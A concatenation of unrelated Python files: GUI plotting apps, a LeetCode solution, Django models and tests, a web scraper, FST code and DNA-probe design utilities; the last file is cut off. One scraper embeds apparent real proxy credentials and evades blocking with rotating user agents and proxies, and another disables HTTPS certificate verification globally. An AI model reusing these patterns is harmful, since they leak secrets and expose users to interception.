scale_1 = Slider(title="Skalierung der 2. Anfangsbedingung", start=0, end=2,
step=0.1, value=0, visible=False)
def animate():
if time.value >= time.end:
time.value = time.start
else:
time.value += time.step
callback_id = 0
def animation_callback(source):
"""
Function adds a callback to the function which animates it. The callback_id
is the id of the process the bokeh server spawns. It is necessary to
remove it later on.
"""
global callback_id
if animation_toggle.active == 1:
callback_id = curdoc().add_periodic_callback(animate, 100)
else:
curdoc().remove_periodic_callback(callback_id)
def toggle_callback(source):
"""
Enables the 'more advanced' options so that the user is not distracted by
the functionality in the first place
"""
advanced_toggle.visible = False
init_1_selector.visible = True
scale_1.visible = True
# Set the time back to 0 so that solution stays in the viewport
time.value = 0
scale_1.value = 0.2
def slider_callback(attr, old, new):
"""
Whenever a slider value changes, the value pairs for the plot are
recalculated and sent to the client by updating the data member variable of
the data_source object.
"""
x, u = update_data(init_0_selector.active, speed.value, scale_0.value,
time.value, init_1_selector.active, scale_1.value)
data_source.data = {'x': x, 'y': u}
def init_0_selector_callback(source):
scale_0.value = 1
slider_callback(0, 0, 0)
def init_1_selector_callback(source):
scale_1.value = 0.2
slider_callback(0, 0, 0)
# Call callback once upfront to populate the plot
slider_callback(0,0,0)
# Connect the widgets with their respective callbacks
animation_toggle.on_click(animation_callback)
advanced_toggle.on_click(toggle_callback)
for slider in (speed, scale_0, time, scale_1):
slider.on_change("value", slider_callback)
init_0_selector.on_click(init_0_selector_callback)
init_1_selector.on_click(init_1_selector_callback)
# Assemble the plot
inputs = WidgetBox(init_0_selector, speed, scale_0, animation_toggle, time,
advanced_toggle, init_1_selector, scale_1)
curdoc().add_root(Row(plot, inputs, width=WIDTH_TOAL))
|
from collections import Counter
from typing import List
class Solution:
def mostCommonWord(self, paragraph: str, banned: List[str]) -> str:
punctuation = "!?',;."
cleansed = ''.join([' ' if t in punctuation else t for t in paragraph])
cleansed_counts = Counter(cleansed.lower().split()).most_common()
print(cleansed_counts)
for word, count in cleansed_counts:
if word not in banned: return word
|
import webbrowser
import time
time_control = 0
time_total = 3
print('Current Time: '+time.ctime())
while(time_control < time_total):
time.sleep(5)
webbrowser.open("http://www.baidu.com")
time_control += 1
|
# coding: utf-8
# ----------------------------------------------------------------------------
# <copyright company="Aspose" file="AsnEncodedData.py">
# Copyright (c) 2018-2019 Aspose Pty Ltd. All rights reserved.
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# </summary>
# ----------------------------------------------------------------------------
import pprint
import re
import six
from asposecadcloud.models.oid import Oid
class AsnEncodedData(object):
"""
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'oid': 'Oid',
'raw_data': 'str'
}
attribute_map = {
'oid': 'Oid',
'raw_data': 'RawData'
}
discriminator_value_class_map = {
'X500DistinguishedName': 'X500DistinguishedName'
}
def __init__(self, oid=None, raw_data=None):
"""AsnEncodedData - a model defined in Swagger"""
super(AsnEncodedData, self).__init__()
self._oid = None
self._raw_data = None
if oid is not None:
self.oid = oid
if raw_data is not None:
self.raw_data = raw_data
@property
def oid(self):
"""Gets the oid of this AsnEncodedData.
:return: The oid of this AsnEncodedData.
:rtype: Oid
"""
return self._oid
@oid.setter
def oid(self, oid):
"""Sets the oid of this AsnEncodedData.
:param oid: The oid of this AsnEncodedData.
:type: Oid
"""
self._oid = oid
@property
def raw_data(self):
"""Gets the raw_data of this AsnEncodedData.
:return: The raw_data of this AsnEncodedData.
:rtype: str
"""
return self._raw_data
@raw_data.setter
def raw_data(self, raw_data):
"""Sets the raw_data of this AsnEncodedData.
:param raw_data: The raw_data of this AsnEncodedData.
:type: str
"""
if raw_data is not None and not re.search('^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=)?$', raw_data):
raise ValueError("Invalid value for `raw_data`, must be a follow pattern or equal to `/^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=)?$/`")
self._raw_data = raw_data
def get_real_child_model(self, data):
"""Returns the real base class specified by the discriminator"""
discriminator_value = data.get(self.discriminator)
return self.discriminator_value_class_map.get(discriminator_value.lower()) if discriminator_value else None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AsnEncodedData):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
n=int(input())
a=[]
for i in range(n):
a.append(int(input()))
v=min(a)
b=[]
for j in range(2,v+1):
flag=0
for g in a:
if(g%j!=0):
flag=1
break
if(flag==0):
b.append(j)
print(len(b))
|
# -*- coding: utf-8 -*-
from qtgraph_editor import QTGraphWidgetEditor
from traits.api import HasTraits, Int, Str, Instance, Dict, Array
from traitsui.api import Item, View, EnumEditor, HGroup, Label
from instruments.i_instrument import IInstrument
import pyqtgraph as pg
import numpy as np
import logging
logger = logging.getLogger(__name__)
pg.setConfigOption('background', 'w')
pg.setConfigOption('foreground', 'k')
DATA_LINES = 172800
COLOR_MAP = [(255, 63, 0), (0, 63, 255), (63, 255, 0), (255, 255, 63), \
(255, 63, 255), (63, 255, 255), (160, 0, 0), (0, 0, 160), \
(0, 160, 0), (0, 160, 160), (160, 160, 0), (160, 0, 160), \
(255, 160, 160), (160, 160, 255), (160, 255, 160), (0, 0, 63)]
SI_ACR = {'Voltage': 'V', 'Current': 'A', 'Resistance': u"\u2126", 'Time': 's',
'SampleNumber': '', 'Capacitance': 'F', 'Frequency': 'Hz', 'BIAS': 'V', 'Temperature': u'\u00B0C',
'Percent': '%'}
class PlotPanel(HasTraits):
pane_name = Str('Plot')
pane_id = Str('sensorscience.unimeas.plot_pane')
plot_widget = Instance(pg.PlotWidget)
plots = Dict
data = Array
x_units = Dict
y_units = Dict
index = Int(0)
selected_x_unit = Int(0)
selected_y_unit = Int(0)
plot_size = Int(DATA_LINES)
plot_increment = Int
legend = Instance(pg.LegendItem)
instrument = Instance(IInstrument)
traits_view = View(Item('plot_widget', editor=QTGraphWidgetEditor(), show_label=False),
HGroup(Label('y-unit: '), Item('selected_y_unit',
editor=EnumEditor(name='y_units'), show_label=False),
Label('x-unit: '), Item('selected_x_unit',
editor=EnumEditor(name='x_units'), show_label=False)))
def _plot_widget_default(self):
plot = pg.PlotWidget()
self.vLine = pg.InfiniteLine(angle=90, movable=False, pen=({'color': '90909080', 'width': 1}))
self.hLine = pg.InfiniteLine(angle=0, movable=False, pen=({'color': '90909080', 'width': 1}))
plot.addItem(self.vLine, ignoreBounds=True)
plot.addItem(self.hLine, ignoreBounds=True)
self.label = pg.TextItem(anchor=(1, 1))
plot.addItem(self.label)
self.label.setPos(plot.getPlotItem().getViewBox().viewRect().right(), \
plot.getPlotItem().getViewBox().viewRect().top())
self.proxy = pg.SignalProxy(plot.scene().sigMouseMoved, rateLimit=60, slot=self.mouse_moved)
plot.sigRangeChanged.connect(self.range_changed)
return plot
def range_changed(self, evt):
self.label.setPos(self.plot_widget.getPlotItem().getViewBox().viewRect().right(), \
self.plot_widget.getPlotItem().getViewBox().viewRect().top())
def mouse_moved(self, evt):
pos = evt[0] ## using signal proxy turns original arguments into a tuple
if self.plot_widget.sceneBoundingRect().contains(pos):
mousePoint = self.plot_widget.getPlotItem().getViewBox().mapSceneToView(pos)
self.label.setText("x=%0.3e, y=%0.3e" % (mousePoint.x(), mousePoint.y()), color='k')
self.vLine.setPos(mousePoint.x())
self.hLine.setPos(mousePoint.y())
def update_visible_plots(self):
if not hasattr(self.instrument, 'enabled_channels'):
return
self.plot_widget.clearPlots()
for name in [l.text for a, l in self.legend.items]:
self.legend.removeItem(name)
for i in range(len(self.instrument.enabled_channels)):
if self.instrument.enabled_channels[i]:
self.plot_widget.addItem(self.plots[self.instrument.output_channels[i]])
def configure_plots(self, instrument):
self.instrument = instrument
if self.legend is None:
self.legend = self.plot_widget.getPlotItem().addLegend()
for name in [l.text for a, l in self.legend.items]:
self.legend.removeItem(name)
self.plot_widget.enableAutoRange(True, True)
self.plots = {}
self.data = np.zeros(
shape=(len(instrument.output_channels) * (len(instrument.x_units) + len(instrument.y_units)), DATA_LINES),
dtype=np.float32)
for i in range(len(instrument.output_channels)):
self.plots[instrument.output_channels[i]] = pg.PlotCurveItem(x=[0], y=[0],
pen=({'color': COLOR_MAP[i], 'width': 1}),
name=instrument.output_channels[i])
self.plot_increment = len(instrument.x_units) + len(instrument.y_units)
self.x_units = instrument.x_units
self.y_units = instrument.y_units
self.update_visible_plots()
def _selected_x_unit_changed(self, unit):
self.plot_widget.setLabel('bottom', self.x_units[unit], units=SI_ACR.get(self.x_units[unit], unit))
self.selected_x_unit = unit
for channel in self.plots.keys():
self.plots[channel].viewTransformChanged()
def _selected_y_unit_changed(self, unit):
self.plot_widget.setLabel('left', self.y_units[unit], units=SI_ACR.get(self.y_units[unit], unit))
self.selected_y_unit = unit
for channel in self.plots.keys():
self.plots[channel].viewTransformChanged()
def _x_units_changed(self):
self._selected_x_unit_changed(0)
def _y_units_changed(self):
self._selected_y_unit_changed(0)
def start_stop(self, starting):
logger.info('start_stop')
if starting is True:
self.index = 0
def add_data(self, data):
# logger.info('add_data %s', data)
if self.index >= self.plot_size:
lines = np.shape(self.data)[0]
self.data = np.concatenate((self.data, np.zeros(shape=(lines,
DATA_LINES), dtype=np.float32)), axis=1)
self.plot_size = self.plot_size + DATA_LINES
# self.controller.plotting_allowed = False
rows_inc = 0
# self.plot_widget.enableAutoRange(False, False)
# logging.getLogger(__name__).info('plots.keys: %s', self.controller.time_plot.plots.keys())
for channel in self.plots.keys():
channel_data = data[channel]
channel_data_x = channel_data[0]
channel_data_y = channel_data[1]
for key in self.x_units:
self.data[key + rows_inc][self.index] = channel_data_x[self.x_units[key]]
for key in self.y_units:
# try:
self.data[key + len(channel_data_x) + rows_inc][self.index] = channel_data_y[self.y_units[key]]
# except KeyError:
# self.controller.time_plot.plots[channel][0].visible = False
# else:
# self.controller.time_plot.plots[channel][0].visible = True
self.plots[channel].setData(x=self.data[rows_inc + self.selected_x_unit][:self.index],
y=self.data[rows_inc + len(channel_data_x) + self.selected_y_unit][:self.index])
rows_inc += self.plot_increment
# self.controller.data[rows_inc][self.controller.index] = data['gasmixer'][1].values()[0]
self.index += 1
# self.plot_widget.autoRange()
# self.updatePlot()
# self.controller.data_updated = True
# self.controller.plotting_allowed = True
# logging.getLogger(__name__).info('controller.data %s', self.controller.data)
#
# def updatePlot(self):
# for key, value in self.plots.items():
# if value.opts['name'] == key:
# value.setData(x=
#
if __name__ == '__main__':
p = PlotPanel()
p.configure_traits()
|
import time
from fake_useragent import UserAgent
from retrying import retry
import requests
from lxml import etree
from pymongo import MongoClient
#通用爬虫功能
class Common_Spider(object):
#获取随机UA头的接口
@staticmethod
def get_random_ua():
ua = UserAgent()
agent = ua.random
return agent
#发起一个网络请求,使用retry模块,如果请求失败报错就重新发出请求
@retry
def make_a_request(self, url, data_type,waiting_time=0,is_proxy_pool=False):
headers = {
'User-Agent': self.get_random_ua(),
'Referer':'http://www.dianping.com/guangzhou/ch85/g235',
# 'Cookie':'_lxsdk_cuid=169fae07440c8-085074ba2ec85c-3c604504-1fa400-169fae07440c8; _lxsdk=169fae07440c8-085074ba2ec85c-3c604504-1fa400-169fae07440c8; _hc.v=bd91c4b0-1aa4-06e6-b09a-3e3e041530eb.1554692212; _lx_utm=utm_source%3DBaidu%26utm_medium%3Dorganic; s_ViewType=10; cy=1500; cye=boluo; _lxsdk_s=169fb8682aa-300-0c8-cdb%7C%7C843'
}
#使用代理池时访问flask接口
time.sleep(waiting_time)
#是否使用ip池,需要先提前启动ip池
if is_proxy_pool:
proxy_url = 'http://0.0.0.0:5555/random'
rst = requests.get(proxy_url)
proxy = rst.text
ip = {
'http': proxy,
'https': proxy
}
rst = requests.get(url, headers=headers, proxies=ip, timeout=3)
else:
# targetUrl = "http://test.abuyun.com"
# targetUrl = "http://proxy.abuyun.com/switch-ip"
# targetUrl = "http://proxy.abuyun.com/current-ip"
# 代理服务器
proxyHost = "http-dyn.abuyun.com"
proxyPort = "9020"
# 代理隧道验证信息
proxyUser = "HDVPA67NY314087D"
proxyPass = "55DEA9FC8386E5D8"
proxyMeta = "http://%(user)s:%(pass)s@%(host)s:%(port)s" % {
"host": proxyHost,
"port": proxyPort,
"user": proxyUser,
"pass": proxyPass,
}
proxies = {
"http": proxyMeta,
"https": proxyMeta,
}
rst = requests.get(url,headers=headers,proxies=proxies,timeout=0.5)
# print(rst.status_code)
#根据数据类型返回数值
if data_type == 'text':
return rst.text
elif data_type == 'content':
return rst.content.decode()
elif data_type == 'bytes':
return rst.content
else:
raise Exception('plz enter specified type')
#获得结构化Html数据
def get_html_from_data(self,data):
if isinstance(data,str) or isinstance(data,bytes):
html = etree.HTML(data)
return html
else:
raise Exception('数据类型应为str或bytes')
#使用xpath定位元素
def get_data_by_xpath(self,html,locating_syntax,is_single=True):
rst = html.xpath(locating_syntax)
#返回列表还是单个数据
if is_single:
return rst[0] if len(rst) != 0 else '/'
else:
return rst
#使用mongodb储存数据
def save_data_by_mongodb(self,data,db_name,collection_name):
client = MongoClient('localhost',27017)
db = client[db_name][collection_name]
if isinstance(data,list):
for i in data:
db.insert(i)
print('插入数据成功')
elif isinstance(data,dict):
db.insert(data)
print('插入数据成功')
else:
raise Exception('数据类型应为list或str') |
class GlobalVars(dict):
def __new__(cls, *args, **kwargs):
try:
return cls.__instance
except AttributeError:
cls.__instance = super().__new__(cls, *args, **kwargs)
cls.__instance.need_init = True
return cls.__instance
def __init__(self, *args, **kwargs):
if self.need_init:
super(GlobalVars, self).__init__(*args, **kwargs)
self.need_init = False
class Result:
def __new__(cls, *args, **kwargs):
try:
return cls.__instance
except AttributeError:
cls.__instance = super().__new__(cls, *args, **kwargs)
cls.__instance.need_init = True
return cls.__instance
def __init__(self):
if self.need_init:
self.need_init = False
self.res = ''
def add(self, val):
sep = " " if self.res and self.res[-1] != "\n" else ""
if isinstance(val, (list, tuple, set)):
self.res += sep + ' '.join((str(x) for x in val))
else:
self.res += sep + str(val)
def flush(self):
self.res = ''
|
from urllib import request,parse
import ssl
#
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://www.12306.cn/mormhweb"
rsp = request.urlopen(url)
html = rsp.read().decode()
print(html)
|
# Generated by Django 3.1.1 on 2020-10-12 04:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0002_auto_20201012_0018'),
]
operations = [
migrations.AlterField(
model_name='qapair',
name='question',
field=models.CharField(max_length=150),
),
]
|
from .models import *
from rest_framework import serializers
# from django.db import models
class UserSerializer(serializers.ModelSerializer):
class Meta:
model=User
fields=['id','username','first_name','last_name','email']
class TeacherSerializer(serializers.ModelSerializer):
# teacher_name=UserSerializer(read_only=True,many=True)
class Meta:
model=Teacher
fields='__all__'
class StudentSerializer(serializers.ModelSerializer):
# student_name=UserSerializer(read_only=True,many=True)
class Meta:
model=Student
fields='__all__'
# read_only_fields = ['roll_no','user']
class CourseSerializer(serializers.ModelSerializer):
teacher_details=TeacherSerializer(read_only=True,many=True,source='teacher')
student_details=StudentSerializer(read_only=True,many=True,source='members')
class Meta:
model=Course
fields='__all__'
class StudentCourseSerializer(serializers.ModelSerializer):
class Meta:
model=StudentCourse
fields='__all__'
class AssessmentSerializer(serializers.ModelSerializer):
class Meta:
model=Assessment
fields='__all__'
class StudentDetailSerializer(serializers.ModelSerializer):
courses=serializers.StringRelatedField(many=True,read_only=True)
user=UserSerializer(read_only=True)
class Meta:
model=Student
fields='__all__'
# depth=1
class TeacherDetailSerializer(serializers.ModelSerializer):
courses=serializers.StringRelatedField(many=True,read_only=True)
user=UserSerializer(read_only=True)
class Meta:
model=Teacher
fields='__all__'
# depth=1
|
# -*- coding: utf-8 -*-
import re, sys
import pywrapfst, pynini
from pywrapfst import Fst
sys.path.append('../../fst')
from fst import fst_config, fst
from fst.fst import FST, Transition
epsilon = 'ε'
marker = '•'
wildcard = '□'
segments = ['t', 'r', 'i', 's', 'u', 'm']
stem_str = '>• t r• i s t i• <'
stem = fst.linear_acceptor(stem_str)
T = stem.T.copy()
for t in T:
if re.search(marker, t.olabel):
for segment in segments:
stem.T.add(Transition(
src=t.dest, ilabel=epsilon, olabel=segment, dest=t.dest))
for t in stem.T:
t.ilabel = re.sub(marker, '', t.ilabel)
t.olabel = re.sub(marker, '', t.olabel)
print(stem)
fst.draw(stem, 'stem.dot')
output_str = '> t r u m i s t i <'
output = fst.linear_acceptor(output_str)
print(output)
align = fst.intersect(stem, output)
print(align)
fst.draw(align, 'align.dot')
#stem = '>tristi<'
#fst_stem = pynini.acceptor(stem, token_type="utf8")
#print(fst_stem.print())
#print(fst_stem.input_symbols())
|
from django.test import Client
from django.urls import reverse
import unittest
client = Client()
class TestResizeURLs(unittest.TestCase):
def test_index(self):
response = client.get('/')
self.assertEqual(response.status_code, 200)
if __name__ == '__main__':
unittest.main() |
import zipfile
import numpy as np
def extract_bits(filename):
if zipfile.is_zipfile(filename):
zp = zipfile.ZipFile(filename)
raw_buffer = zp.read(zp.filelist[0])
bytes = np.frombuffer(raw_buffer, dtype=np.uint8)
else:
bytes = np.fromfile(filename, dtype=np.uint8)
return np.unpackbits(bytes)
if __name__ == "__main__":
print len(extract_bits( "smb.nes" ))
|
from multiprocessing import Pool
from CellStoch import *
def f(mode):
m=sinIR_full()
m.min_gr=0.25
resume=False
m.sim_cell_lines(setting='dc',mode="n100",minimal_time_interval=0.1,max_time=30,num_of_lines=500,resume=resume,save_name='dc_fix_t6')
if __name__ == '__main__':
with Pool(8) as p:
print(p.map(f, ['dc']))
'''
def sample_lines(save_name,numbers,species):
plt.clf()
m=sinIR_full(minimal_time_interval=0.1)
for i in numbers:
full_dynamics=m.__get_pkl_data__(save_name,i)
time=[t-3 for t in full_dynamics['time']]
c=full_dynamics[species]
plt.plot(time,c)
plt.xlabel('time')
plt.xlim([2,16])
plt.ylabel('number')
imgname=save_name+"_sample.png"
plt.savefig(os.path.join(m.analyze_dir,imgname))
sample_lines("test_clines_wt",[68,69,85,86,67,68,105],'SlrR_d')
sample_lines("test_clines_da",[68,69,85,86,67,68,105],'SlrR_d')
sample_lines("test_clines_ds",[1,2,3,4,5,82,116],'SlrR_d')
sample_lines("test_clines_dc",[1,2,3,4,5,82,116],'SlrR_d')
'''
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from SellBuy.models import CurrentUserHolding, UserShareQuantity
from django.shortcuts import render
from LoginRegister.models import UserDetail
from django.http import JsonResponse
from Helpers.utils import get_or_none
from django.contrib.auth.models import User
# Create your views here.
def leaderboard(request):
return render(request, 'LeaderBoard/leaderboard.html')
def leaderboard_update(request):
leaderboard = CurrentUserHolding.objects.order_by('current_holding').reverse()
leaderboard_list = []
for obj in leaderboard:
total_holdings = obj.current_holding
for user_share in UserShareQuantity.objects.filter(user=obj.user):
share = user_share.share.current_price
quantity = user_share.quantity
total_holdings += round(share*quantity, 2)
leaderboard_data = {
"username" : obj.user.username,
"holding" : round(total_holdings, 2),
"index" : 0
}
leaderboard_list.append(leaderboard_data)
leaderboard_list = sorted(leaderboard_list, key = lambda x: x['holding'], reverse = True)
index = 1
for o in leaderboard_list:
o['index'] = index
index += 1
data = {
"success" : True,
"data" : leaderboard_list
}
return JsonResponse(data, safe=False) |
from tkinter import *
from Point import *
class Rectanguloid:
def __init__(self, p1, p2):
window = Tk()
window.title("Rectanguloid")
changeX = 25
changeY = 40
canvas = Canvas(window, width = 200, height = 250, bg = "white")
canvas.pack()
canvas.create_rectangle(p1.getX(), p1.getY(), p2.getX(), p2.getY())
canvas.create_rectangle(p1.getX() + changeX, p1.getY() + changeY, p2.getX() + changeX, p2.getY() + changeY)
canvas.create_line(p1.getX(), p1.getY(), p1.getX() + changeX, p1.getY() + changeY)
canvas.create_line(p1.getX(), p2.getY(), p1.getX() + changeX, p2.getY() + changeY)
canvas.create_line(p2.getX(), p1.getY(), p2.getX() + changeX, p1.getY() + changeY)
canvas.create_line(p2.getX(), p2.getY(), p2.getX() + changeX, p2.getY() + changeY)
Rectanguloid(Point(10, 75), Point(125, 175))
|
from utils import regex_utils
class WhitelistMatcher:
def __init__(self, model):
self.model = model
def get_match(self, **args) -> str:
whitelist = self.model.get_whitelist(args)
for whitelist_item in whitelist:
if regex_utils.is_match_regex(whitelist_item.regex, args['url']):
return whitelist_item.regex
return ""
|
import string
import math
import re
import seq
def calcscore(inscore,k,newSD):
return (inscore*k + newSD)/(k+1)
def sequenceOkay(strg, search=re.compile('[^aAcCgGtT]').search):
"""Return true if all characters are valid [aAcCgGtT] in sequence."""
return not bool(search(strg))
def TmScore(sequence):
# This gives the Tm score of a sequence with target Tm of 67.5
if sequenceOkay(sequence):
score = (Tm(sequence.lower())-67.5)**2
else:
score = float('Inf')
return score
def TmScore_Tm(sequence, targetTm):
# This gives the Tm score of a sequence with target melting temp of Tm
if sequenceOkay(sequence):
score = (Tm(sequence.lower())-targetTm)**2
else:
score = float('Inf')
return score
def TmScore_RNA_DNA(sequence, targetTm, targetRange):
# This function gives the Tm score of a sequence (i.e., distance to target Tm)
# It also will set the score to infinity if the Tm is outside of the targetRange
if sequenceOkay(sequence):
score = (Tm_RNA_DNA(sequence.lower())-targetTm)**2
if (Tm_RNA_DNA(sequence.lower()) < targetRange[0]) or (Tm_RNA_DNA(sequence.lower()) > targetRange[1]):
score = float('Inf')
else:
score = float('Inf')
return score
def Tm_RNA_DNA(sequence):
# This gives the Tm of a sequence using RNA-DNA energetics
primerConc = 0.00005
temp = 30.0
salt = 0.33
# SantaLucia 98 parameters
delH = {'aa':-7.8, 'ac':-5.9, 'ag':-9.1, 'at':-8.3,
'ca':-9.0, 'cc':-9.3, 'cg':-16.3,'ct':-7.0,
'ga':-5.5, 'gc':-8.0, 'gg':-12.8,'gt':-7.8,
'ta':-7.8, 'tc':-8.6, 'tg':-10.4,'tt':-11.5}
delS = {'aa':-21.9, 'ac':-12.3, 'ag':-23.5, 'at':-23.9,
'ca':-26.1, 'cc':-23.2, 'cg':-47.1, 'ct':-19.7,
'ga':-13.5, 'gc':-17.1, 'gg':-31.9, 'gt':-21.6,
'ta':-23.2, 'tc':-22.9, 'tg':-28.4, 'tt':-36.4}
dH = 0
dS = 0
dH = sum([delH[sequence[i:i+2]] for i in range(len(sequence)-1)])
dS = sum([delS[sequence[i:i+2]] for i in range(len(sequence)-1)])
dH += 1.9
dS += -3.9
dG = dH*1000.0 - (37.0+273.15)*dS
dG = dG/1000
#ans = dH*1000/(dS + (1.9872 * math.log(primerConc/4))) + (16.6 * math.log10(salt)) - 273.15
# print(delH)
# return ans
return dG
def Tm(sequence):
# This gives the Tm of a sequence
primerConc = 0.00005
temp = 30.0
salt = 0.33
# SantaLucia 98 parameters
delH = {'aa':-7.9, 'ac':-8.4, 'ag':-7.8, 'at':-7.2,
'ca':-8.5, 'cc':-8.0, 'cg':-10.6,'ct':-7.8,
'ga':-8.2, 'gc':-9.8, 'gg':-8.0, 'gt':-8.4,
'ta':-7.2, 'tc':-8.2, 'tg':-8.5, 'tt':-7.9}
delS = {'aa':-22.2, 'ac':-22.4, 'ag':-21.0, 'at':-20.4,
'ca':-22.7, 'cc':-19.9, 'cg':-27.2, 'ct':-21.0,
'ga':-22.2, 'gc':-24.4, 'gg':-19.9, 'gt':-22.4,
'ta':-21.3, 'tc':-22.2, 'tg':-22.7, 'tt':-22.2}
dH = 0
dS = 0
dH = sum([delH[sequence[i:i+2]] for i in range(len(sequence)-1)])
dS = sum([delS[sequence[i:i+2]] for i in range(len(sequence)-1)])
if (sequence[0] == 'c') or (sequence[0] == 'g'):
dH += 0.1
dS += -2.8
else:
dH += 2.3
dS += 4.1
if (sequence[-1] == 'c') or (sequence[-1] == 'g'):
dH += 0.1
dS += -2.8
else:
dH += 2.3
dS += 4.1
ans = dH*1000/(dS + (1.9872 * math.log(primerConc/4))) + (16.6 * math.log10(salt)) - 273.15
# print(delH)
return ans
def GCScore(sequence):
if sequenceOkay(sequence):
score = (seq.percentGC(sequence)-.45)**2
else:
score = float('Inf')
return score
def findGoodness(inseq, oligolen, blocklen, scoreFun):
# This finds the goodness of all candidate oligos in inseq
# The output is the "goodness", which should be minimized
# (i.e., it's really the badness)
# The scoreFun is the function you use to find the goodness
# Could be TmScore or GCScore
goodness = []
for i in range(len(inseq)-(oligolen)):
goodness.append(scoreFun(inseq[i:i+oligolen]))
return goodness
def findGoodness_Tm(inseq, oligolen, blocklen, scoreFun, targetTm):
# This finds the goodness of all candidate oligos in inseq
# The output is the "goodness", which should be minimized
# (i.e., it's really the badness)
# The scoreFun is the function you use to find the goodness
# Could be TmScore or GCScore
# targetTm is the target Tm
goodness = []
for i in range(len(inseq)-(oligolen)):
goodness.append(scoreFun(inseq[i:i+oligolen], targetTm))
return goodness
def findGoodness_RNA_DNA(inseq, oligolen, blocklen, scoreFun, targetTm, targetRange):
# This finds the goodness of all candidate oligos in inseq
# The output is the "goodness", which should be minimized
# (i.e., it's really the badness)
# The scoreFun is the function you use to find the goodness
# Could be TmScore or GCScore
# targetTm is the target Tm
goodness = []
for i in range(len(inseq)-(oligolen)):
goodness.append(scoreFun(inseq[i:i+oligolen], targetTm, targetRange))
return goodness
def findOligos(noligos, inseq, goodness, oligolen, blocklen):
# This is the main function to find oligos
# First, you have to run findGoodness to get the oligo scores
# The return value is a list of lists with 3 elements
# Each element of this list is the solution for n=1,2,3...noligos
# For each element of the list, the 3 elements are as follows:
# First element are the scores, second element is the matches
# third element are the oligos.
# Define a few constants
nan = float('Nan')
inf = float('Inf')
# Length of oligo plus the "blocked" area
shortlen = oligolen + blocklen
goodlen = len(inseq) - oligolen
# Initialize the 2D arrays
bmsfpos = [[]]
bmsfsco = [[]]
# Initialize the values assuming the first oligo is the best match at length 0
bmsfpos[0] += [0]
bmsfsco[0] += [goodness[0]]
for i in range(noligos-1):
bmsfpos[0] += [nan]
bmsfsco[0] += [inf]
for x in range(1,len(goodness)):
# First, let's copy in the best solution from the previous iteration
bmsfpos += [list(bmsfpos[x-1])]
bmsfsco += [list(bmsfsco[x-1])]
for k in range(noligos):
potentialscore = inf
if k==0:
potentialscore = goodness[x]
else:
if (x >= shortlen):
if bmsfpos[x-shortlen][k-1] >= 0:
potentialscore = calcscore(bmsfsco[x-shortlen][k-1],k,goodness[x])
if potentialscore < bmsfsco[x][k]:
bmsfpos[x][k] = x
bmsfsco[x][k] = potentialscore
# Okay, now we have to read out the oligos
allmatches = []
allscores = []
for k in range(noligos):
matches = []
x = goodlen - 1
currk = k
if not(math.isnan(bmsfpos[x][currk])):
allscores += [bmsfsco[x][currk]]
for counter in range(k+1):
prevmatch = bmsfpos[x][currk]
matches += [prevmatch]
x = prevmatch-shortlen
currk -= 1
matches.reverse()
allmatches += list([matches])
# Let's find the maximum number of oligos
maxpos = 0
for i in range(len(allscores)):
if allscores[i] < 100:
maxpos = i
allscores = allscores[0:maxpos+1]
allmatches = allmatches[0:maxpos+1]
noligos = maxpos + 1
alloligos = []
for i in range(noligos):
currmatches = allmatches[i]
alloligos += [[seq.reverseComplement(inseq[j:(j+oligolen)]) for j in currmatches]]
output = []
for i in range(noligos):
output += [ [allscores[i], allmatches[i], alloligos[i] ] ]
return output
def alignOutput(inseq,matches,oligolen):
"""Uses matches from findOligos() to make a nice output w/ probes aligned to inseq
Returns 3 elements in a list:
[0] - the inseq
[1] - the oligos
[2] - probe # information
"""
noligos = len(matches)
compoligos = [seq.complement(inseq[j:(j+oligolen)]) for j in matches]
spaceoligos = [' '*(matches[i]-matches[i-1]-oligolen) for i in range(1,noligos)]
spaceoligos = [' '*matches[0]] + spaceoligos
probenum = [ ('Probe # '+str(i+1)).ljust(oligolen) for i in range(noligos)]
compseq = ''.join([spaceoligos[i] + compoligos[i] for i in range(noligos)])
probeseq = ''.join([spaceoligos[i] + probenum[i] for i in range(noligos)])
compseq = compseq.ljust(len(inseq))
probeseq = probeseq.ljust(len(inseq))
return [inseq, compseq, probeseq]
def splitOutput(seqs, width):
ls = [split_list(x,width) for x in seqs]
tmp = []
